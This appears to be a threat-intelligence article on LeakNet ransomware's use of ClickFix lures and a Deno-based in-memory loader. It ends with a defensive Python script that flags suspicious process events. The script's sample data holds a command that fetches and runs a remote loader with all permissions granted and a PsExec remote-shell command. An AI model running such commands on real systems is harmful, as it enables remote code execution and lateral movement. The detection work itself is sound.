
Uncovering the Tactics of LeakNet Ransomware: ClickFix and Deno Runtime Exploits Revealed


The Rise of LeakNet Ransomware: ClickFix Technique and Deno Runtime

The LeakNet ransomware gang has adopted the ClickFix social-engineering technique to gain initial access to corporate networks, and now delivers a malware loader built on Deno, the open-source JavaScript/TypeScript runtime.

ClickFix tricks users into pasting and running attacker-supplied commands themselves, typically from a fake error message or verification prompt, so the victim rather than an exploit executes the first stage. The technique is already used by ransomware groups such as Termite and Interlock and has now found its way into LeakNet’s arsenal.

In LeakNet’s chain, the ClickFix command deploys a Deno-based loader that executes a JavaScript payload directly in memory. Keeping the payload off disk leaves little for file-based scanning or forensic review to find, which lowers the chance of detection.

The Evolution of LeakNet

LeakNet emerged as a ransomware threat actor in late 2024 and has averaged about three victims per month. With these new tactics, the operation may scale up and pose a greater threat to organizations.

The “Bring Your Own Runtime” Attack

Researchers at ReliaQuest describe LeakNet’s use of Deno as a “bring your own runtime” (BYOR) attack. Deno is a legitimate runtime that runs JavaScript and TypeScript outside the browser; because the executable is a widely used developer tool rather than custom malware, it passes blocklists and filters that only stop unknown or untrusted binaries, which makes the activity harder to detect.

Rather than ship a custom loader that could raise red flags, LeakNet drops the legitimate Deno executable and uses it to run the malicious code. The chain is kicked off by VBScript and PowerShell stagers named Romeo*.ps1 and Juliet*.vbs.


Running the payload in memory through Deno is the key to the approach: it leaves minimal forensic artifacts, and a deno.exe process launching a script looks like a routine developer task rather than malicious activity.

Post-Exploitation Tactics

Once the loader runs, LeakNet moves into post-exploitation: DLL sideloading, C2 beaconing, credential discovery, lateral movement with PsExec, and payload staging, with stolen data exfiltrated to Amazon S3 buckets.

Because the attack chain is consistent and repeatable, the researchers note that it gives defenders reliable detection opportunities. Signs of potential LeakNet activity include deno.exe running outside development environments, suspicious browser-initiated executions, abnormal PsExec usage, unexpected outbound traffic to S3, and DLLs sideloaded from atypical directories.
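The detection opportunities above translate naturally into process-creation rules. The script below is an added example, not ReliaQuest’s or the article’s own detection logic: it runs a few heuristics over constructed Sysmon Event ID 1-style records (Image, ParentImage, CommandLine) and flags Deno launched by a script host, Deno running from a temp or public drop location or outside a developer install path, Deno pulling a remote module with all permissions granted, and PsExec started from a script host. The install-path hints, drop locations and command-line patterns are assumptions to tune for your own fleet, not published indicators.

```python
"""Heuristic triage of process-creation events for LeakNet-style
"bring your own runtime" activity (Deno launched via a ClickFix chain).

Added example; not the article's or ReliaQuest's detection logic.
Field names mirror Sysmon Event ID 1; the sample events are constructed.
Path hints and command-line patterns are assumptions, not published IOCs.
"""
import ntpath
import re

# Script hosts a ClickFix chain typically passes through before reaching Deno.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "cmd.exe"}

# Where a developer's Deno install normally lives on Windows (assumption:
# the official installer uses %USERPROFILE%\.deno\bin; extend for your fleet).
DEV_INSTALL_HINTS = ("\\.deno\\bin\\", "\\program files\\", "\\scoop\\")

# Temp or world-writable locations loaders favour for dropped binaries (assumption).
DROP_LOCATIONS = ("\\appdata\\local\\temp\\", "\\programdata\\", "\\users\\public\\")

# `deno run`/`deno eval` followed by a URL: fetching code over the network.
REMOTE_MODULE = re.compile(r"\b(run|eval)\b.*https?://", re.IGNORECASE)
# Deno's "grant everything" switch; case-sensitive like the real flag.
BROAD_PERMS = re.compile(r"(^|\s)(-A|--allow-all)(\s|$)")


def _base(path):
    """Lower-cased file name of a Windows path (works on any host OS)."""
    return ntpath.basename(path).lower()


def classify(event):
    """Return the reasons an event looks like LeakNet-style BYOR activity.

    An empty list means no rule matched."""
    image = _base(event["Image"])
    parent = _base(event["ParentImage"])
    image_path = event["Image"].lower()
    cmdline = event["CommandLine"]
    reasons = []

    if image == "deno.exe":
        if parent in SCRIPT_HOSTS:
            reasons.append(f"deno spawned by script host {parent}")
        if any(d in image_path for d in DROP_LOCATIONS):
            reasons.append("deno running from a temp/public drop location")
        if not any(h in image_path for h in DEV_INSTALL_HINTS):
            reasons.append("deno running outside a developer install path")
        if REMOTE_MODULE.search(cmdline):
            reasons.append("deno fetching and running a remote module")
        if BROAD_PERMS.search(cmdline):
            reasons.append("deno granted all permissions (-A/--allow-all)")
    elif image in {"psexec.exe", "psexec64.exe"} and parent in SCRIPT_HOSTS:
        reasons.append(f"PsExec launched from script host {parent}")
    return reasons


def triage(events):
    """Run classify() over a batch and return only the flagged events."""
    hits = []
    for event in events:
        reasons = classify(event)
        if reasons:
            hits.append({"image": event["Image"],
                         "parent": event["ParentImage"],
                         "reasons": reasons})
    return hits


# Constructed sample events: one benign developer run, one ClickFix-style
# Deno launch, one PsExec launch from PowerShell, one unrelated browser start.
SAMPLE_EVENTS = [
    {"Image": r"C:\Users\dev\.deno\bin\deno.exe",
     "ParentImage": r"C:\Users\dev\AppData\Local\Programs\Microsoft VS Code\Code.exe",
     "CommandLine": "deno run --allow-net main.ts"},
    {"Image": r"C:\Users\alice\AppData\Local\Temp\deno\deno.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'"C:\Users\alice\AppData\Local\Temp\deno\deno.exe" run -A https://example.invalid/loader.js'},
    {"Image": r"C:\Users\alice\AppData\Local\Temp\PsExec64.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"PsExec64.exe \\host01 -accepteula -s cmd.exe"},
    {"Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "chrome.exe"},
]

if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print(hit["image"], "<-", hit["parent"])
        for reason in hit["reasons"]:
            print("   ", reason)
```

Only the second and third events are flagged; the developer’s VS Code-launched Deno and the browser start produce no reasons. In production, feed real Sysmon or EDR process events through `classify()` and treat a Deno event with two or more reasons as worth an immediate look, since a single rule (for example, Deno outside the usual install path) will fire on legitimate portable installs.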

